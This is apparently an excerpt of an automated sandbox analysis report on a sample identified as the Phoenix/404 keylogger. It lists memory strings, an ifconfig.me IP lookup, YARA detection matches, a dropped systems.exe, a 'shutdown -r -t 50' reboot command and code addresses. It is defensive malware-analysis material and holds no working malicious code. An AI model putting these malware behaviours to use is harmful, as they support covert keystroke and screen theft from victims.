              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: systems.exe, 00000007.00000003.413651062.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.413417698.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: systems.exe, 00000007.00000003.413651062.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn)5/
              Source: systems.exe, 00000007.00000003.413957196.0000000006EF4000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.414026080.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.413874101.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.414103181.0000000006EF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/R8
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: systems.exe, 00000007.00000003.412552746.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/g2
              Source: systems.exe, 00000007.00000003.413957196.0000000006EF4000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.414026080.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.413874101.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.414103181.0000000006EF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn;
              Source: systems.exe, 00000007.00000003.413233364.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnL5
              Source: systems.exe, 00000007.00000003.413233364.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnP5-
              Source: systems.exe, 00000007.00000003.413233364.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnht
              Source: systems.exe, 00000007.00000003.413417698.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnicrz
              Source: systems.exe, 00000007.00000003.413417698.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnn-u
              Source: systems.exe, 00000007.00000003.430883500.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.431114108.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: systems.exe, 00000007.00000003.430883500.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.431510467.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.431114108.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.431730763.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.431309575.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmj
              Source: systems.exe, 00000007.00000003.412459929.0000000006EEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416787050.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: systems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416485037.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416787050.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/0
              Source: systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416485037.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416787050.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/9
              Source: systems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/E
              Source: systems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416787050.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/S
              Source: systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
              Source: systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/a
              Source: systems.exe, 00000007.00000003.416787050.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/es-e
              Source: systems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416485037.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416033999.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416204040.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416787050.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/j
              Source: systems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416787050.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
              Source: systems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/9
              Source: systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/E
              Source: systems.exe, 00000007.00000003.416033999.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416204040.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/lic0
              Source: systems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416485037.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416787050.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/n-u
              Source: systems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/rtr
              Source: systems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
              Source: systems.exe, 00000007.00000003.407149985.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.406990546.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: systems.exe, 00000007.00000003.407149985.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.406990546.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comibi
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: systems.exe, 00000007.00000003.412459929.0000000006EEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: systems.exe, 00000007.00000003.412326974.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.412552746.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.412459929.0000000006EEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krus
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: systems.exe, 00000007.00000003.409168651.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.net
              Source: systems.exe, 00000007.00000003.409436719.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.409043945.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.409317684.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.409168651.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.net(
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: systems.exe, 00000007.00000003.409043945.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.409317684.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.409168651.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netPI
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: systems.exe, 00000007.00000003.414673072.0000000006EF5000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: systems.exe, 00000007.00000003.414673072.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnb5
              Source: systems.exe, 00000007.00000003.414673072.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
              Source: systems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457885749.000000000619C000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823791013.000000000616F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457188901.00000000061A5000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pki.goog/repository/0
              Source: unknownDNS traffic detected: queries for: ifconfig.me
              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ifconfig.meConnection: Keep-Alive

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Yara detected PhoenixKeylogger
              Source: Yara matchFile source: 7.0.systems.exe.220000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.systems.exe.220000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000000.289663660.0000000000222000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.812023863.0000000000222000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: systems.exe PID: 2880, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\Public\Downloads\systems.exe, type: DROPPED
              Contains functionality to capture screen (.Net source)
              Source: systems.exe.1.dr, ???F?Z?U???X?G?G?Q.cs.Net Code: ???BWXW
              Source: 7.2.systems.exe.220000.0.unpack, ???F?Z?U???X?G?G?Q.cs.Net Code: ???BWXW
              Source: 7.0.systems.exe.220000.0.unpack, ???F?Z?U???X?G?G?Q.cs.Net Code: ???BWXW
              Source: C:\Users\Public\Downloads\systems.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 7.0.systems.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 7.0.systems.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
              Source: 7.2.systems.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 7.2.systems.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
              Source: 00000007.00000000.289663660.0000000000222000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
              Source: 00000007.00000002.812023863.0000000000222000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
              Source: Process Memory Space: systems.exe PID: 2880, type: MEMORYSTRMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
              Source: C:\Users\Public\Downloads\systems.exe, type: DROPPEDMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: C:\Users\Public\Downloads\systems.exe, type: DROPPEDMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
              Uses shutdown.exe to shutdown or reboot the system
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 50
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A087091_2_00A08709
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A168871_2_00A16887
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A2009A1_2_00A2009A
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A0C0171_2_00A0C017
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A0E1471_2_00A0E147
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A172FF1_2_00A172FF
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A032061_2_00A03206
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A212181_2_00A21218
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A2D35E1_2_00A2D35E
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A314641_2_00A31464
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A205961_2_00A20596
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A0E57B1_2_00A0E57B
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A0276D1_2_00A0276D
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A209AE1_2_00A209AE
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A13A021_2_00A13A02
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A24A0A1_2_00A24A0A
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A0EB7B1_2_00A0EB7B
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A16CBC1_2_00A16CBC
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A24C391_2_00A24C39
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A13C7D1_2_00A13C7D
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A0FC431_2_00A0FC43
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A20DE31_2_00A20DE3
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A2CEB01_2_00A2CEB0
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A15EB81_2_00A15EB8
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A05EBC1_2_00A05EBC
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A13FAE1_2_00A13FAE
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A0EFEF1_2_00A0EFEF
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A03FFE1_2_00A03FFE
              Source: C:\Users\Public\Downloads\systems.exeCode function: 7_2_00B8E3C87_2_00B8E3C8
              Source: C:\Users\Public\Downloads\systems.exeCode function: 7_2_00BDC1F07_2_00BDC1F0
              Source: C:\Users\Public\Downloads\systems.exeCode function: 7_2_00BDE2C07_2_00BDE2C0
              Source: C:\Users\Public\Downloads\systems.exeCode function: 7_2_00BDB5D87_2_00BDB5D8
              Source: C:\Users\Public\Downloads\systems.exeCode function: 7_2_00BD23387_2_00BD2338
              Source: C:\Users\Public\Downloads\systems.exeCode function: 7_2_00BDB9207_2_00BDB920
              Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 98%
              Source: 2cB42TzofC.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: systems.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: C:\Users\user\Desktop\2cB42TzofC.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeSection loaded: dxgidebug.dllJump to behavior
              Source: Joe Sandbox ViewDropped File: C:\Users\Public\Downloads\systems.exe F523C67C26E042F966A9C394D84E8B3D29EE6C5AF00A5F1D0392CF32AF373DD2
              Source: 2cB42TzofC.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 7.0.systems.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.0.systems.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
              Source: 7.2.systems.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.2.systems.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
              Source: 00000007.00000000.289663660.0000000000222000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
              Source: 00000007.00000002.812023863.0000000000222000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
              Source: Process Memory Space: systems.exe PID: 2880, type: MEMORYSTRMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
